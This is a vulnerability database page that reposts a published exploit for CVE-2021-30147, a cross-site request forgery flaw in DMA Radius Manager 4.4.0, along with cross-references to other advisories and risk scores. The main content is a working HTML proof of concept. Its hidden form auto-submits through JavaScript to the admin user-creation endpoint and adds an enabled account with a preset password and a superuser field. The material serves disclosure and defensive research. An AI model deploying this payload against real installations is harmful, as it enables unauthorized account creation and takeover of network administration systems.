DMA Radius Manager 4.4.0 - Cross-Site Request Forgery Vulnerability

🗓️ 08 Apr 2021 00:00:00Reported by zdtType

zdt🔗 0day.today👁 76 Views

Cross-Site Request Forgery in DMA Radius Manager 4.4.

Reporter	Title	Published	Views	Family All 14
Circl	CVE-2021-30147	21 Sep 202106:42	–	circl
CNNVD	DMA Softlab DMA Radius Manager 跨站请求伪造漏洞	6 Apr 202100:00	–	cnnvd
CVE	CVE-2021-30147	7 Apr 202102:02	–	cve
Cvelist	CVE-2021-30147	7 Apr 202102:02	–	cvelist
Exploit DB	DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF)	8 Apr 202100:00	–	exploitdb
EUVD	EUVD-2021-17084	7 Oct 202500:30	–	euvd
NVD	CVE-2021-30147	7 Apr 202103:15	–	nvd
OSV	CVE-2021-30147	7 Apr 202103:15	–	osv
OSV	UBUNTU-CVE-2021-30147	7 Apr 202103:15	–	osv
Packet Storm	DMA Radius Manager 4.4.0 Cross Site Request Forgery	8 Apr 202100:00	–	packetstorm

# Exploit Title: DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF)
# Exploit Author: Issac Briones
# Vendor Homepage: http://www.dmasoftlab.com/
# Software Download: https://sourceforge.net/projects/radiusmanager/
# Version: 4.4.0
# CVE: CVE-2021-30147

<html>
	<body>
		< ! -- Change IP addr to IP addr that RADIUS manager is located -- >
		<form action="http://192.168.1.2/admin.php?cont=store_user" method="POST">
			<input type="hidden" name="username" value="csrf_usr" />
			<input type="hidden" name="enableuser" value="1" />
			<input type="hidden" name="acctype" value="0" />
			<input type="hidden" name="password1" value="csrfusr" />
			<input type="hidden" name="password2" value="csrfusr" />
			<input type="hidden" name="maccm" value="" />
			<input type="hidden" name="mac" value="" />
			<input type="hidden" name="ipmodecpe" value="0" />
			<input type="hidden" name="simuse" value="1" />
			<input type="hidden" name="firstname" value="" />
			<input type="hidden" name="lastname" value="" />
			<input type="hidden" name="company" value="" />
			<input type="hidden" name="address" value="" />
			<input type="hidden" name="city" value="" />
			<input type="hidden" name="zip" value="" />
			<input type="hidden" name="country" value="" />
			<input type="hidden" name="state" value="" />
			<input type="hidden" name="phone" value="" />
			<input type="hidden" name="mobile" value="" />
			<input type="hidden" name="email" value="" />
			<input type="hidden" name="taxid" value="" />
			<input type="hidden" name="srvid" value="0" />
			<input type="hidden" name="downlimit" value="0" />
			<input type="hidden" name="uplimit" value="0" />
			<input type="hidden" name="comblimit" value="0" />
			<input type="hidden" name="expiration" value="2021-04-06" />
			<input type="hidden" name="uptimelimit" value="00:00:00" />
			<input type="hidden" name="credits" value="0.00" />
			<input type="hidden" name="contractid" value="" />
			<input type="hidden" name="contractvalid" value="" />
			<input type="hidden" name="gpslat" value="" />
			<input type="hidden" name="gpslong" value="" />
			<input type="hidden" name="comment" value="" />
			<input type="hidden" name="superuser" value="{SUPERUSER}" />
			<input type="hidden" name="lang" value="English" />
			<input type="hidden" name="groupid" value="1" />
			<input type="hidden" name="custattr" value="" />
			<input type="hidden" name="cnic" value="" />
			<input type="hidden" name="cnicfile1" value="(binary)" />
			<input type="hidden" name="cnicfile2" value="(binary)" />
			<input type="hidden" name="adduser" value="Add user" />
		</form>
	<script>
		document.forms[0].submit();
	</script>
	</body>

</html>

#  0day.today [2021-10-17]  #

08 Apr 2021 00:00Current

0.7Low risk

Vulners AI Score0.7

CVSS 26.8

CVSS 3.18.8

EPSS0.00404